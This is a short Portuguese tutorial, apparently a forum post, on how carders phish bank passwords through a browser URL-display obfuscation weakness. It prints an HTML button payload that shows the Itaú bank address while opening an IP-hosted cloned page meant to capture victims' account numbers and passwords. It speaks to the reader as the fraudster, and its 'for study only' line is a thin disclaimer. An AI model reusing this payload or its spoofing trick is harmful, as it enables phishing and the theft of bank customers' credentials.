Vou explicar abaixo em poucas palavras como os carders roubam senhas de usuários maus informados e atualizados:
Nome deste tipo de bug Multiple Browser URI Display Obfuscation Weakness
Para começar não vou ficar aqui falando como você deve evitar com que isso ocorra com você, bom você deve ser esperto o bastante para não ficar abrindo qualquer porcarias que mandam pra você por e-mail...
Vamos ao que enteressa.. o bug...
A falha é bem simples basta você colocar esse codigo abaixo que vou escrever na página clonada do seu banco falso, não estou dizendo aqui que é para você fazer isso, estou apenas colocando como se faz isso, apenas para estudo... então olha o que você vai fazer hemmmmmmm!!!
Vamos lá...
Em um documento HTML você deve escrever o seguinte codigo:

<input onclick="javascript:window.open(unescape('http://www.itau.com.br%01@http://200.222.123.2'),",")" type="button" value="testar">

O script acima ira criar um botão que ao ser clicado a vitíma ira cair dentro do site especificado logo após o @ http://200.222.123.2 no nosso caso, que é o ip ou dns do seu site clonado, mas isso tudo ira acontecer com o nome http://www.itau.com.br escrito no browser assim enganando a vitíma pois ela vai pensar que estará toda segura no seu site do banco, mais não, ela estará no site clonado onde a sua conta e sua senha podera ser capturada e enviada ao fraudador ou carder...

Bom assim termino o texto, espero ter tirado todas as suas dúvidas sobre como os carders fazem isto.. e é claro essa é só uma das técnicas.